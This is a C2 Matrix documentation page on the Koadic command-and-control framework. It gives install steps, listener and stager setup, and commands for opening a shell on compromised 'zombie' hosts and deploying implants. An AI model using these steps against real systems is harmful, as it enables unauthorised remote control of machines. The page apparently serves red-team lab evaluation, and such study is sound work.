C2 Matrix
  • The C2 Matrix
  • About
  • SANS Slingshot C2 Matrix VM
  • Contribute
  • Feedback
  • Lab Infrastructure
    • C2 Matrix Eval Lab
    • Basic Lab
    • Virtual Machines with C2s
    • Docker
    • Resources
  • C2
    • Caldera
    • Covenant
    • Deimos
    • Empire3
    • Empire5
    • Havoc
    • ibombshell
    • Koadic
    • Merlin
    • Mythic
    • Nuages
    • PoshC2
    • PowerHub
    • SilentTrinity
    • Sliver
    • SCYTHE
    • TrevorC2
  • Attack Infrastructure
    • Resources
    • Redirectors/Relays
  • Detection
    • Basics
    • Beacons
    • JA3/JA3S Hashes
    • JARM
Powered by GitBook
On this page
  • Install Koadic
  • Run Koadic
  • Listener
  • Interact
  • Post Modules
  • Notes

Was this helpful?

  1. C2

Koadic

Install Koadic

cd /opt/
git clone https://github.com/zerosum0x0/koadic
cd koadic
apt-get install python3-pip
pip3 install -r requirements.txt

Run Koadic

sudo koadic

Listener

use stager/js/
set SRVHOST <IP>
set SRVPORT 443
run

Interact

zombies

Post Modules

cmdshell <zombie ID>
use implant/
set PAYLOAD 0
set ZOMBIE 0

Notes

Spawns rundll32.exe
HTTP Long Polling https://www.pubnub.com/blog/http-long-polling/
Continuous connection
Logging in JSON: /opt/koadic/restores
Proxy awareness doesn’t work: https://github.com/zerosum0x0/koadic/issues/55
Stagers: 6
Implants: 44

PreviousibombshellNextMerlin

Last updated 5 years ago

Was this helpful?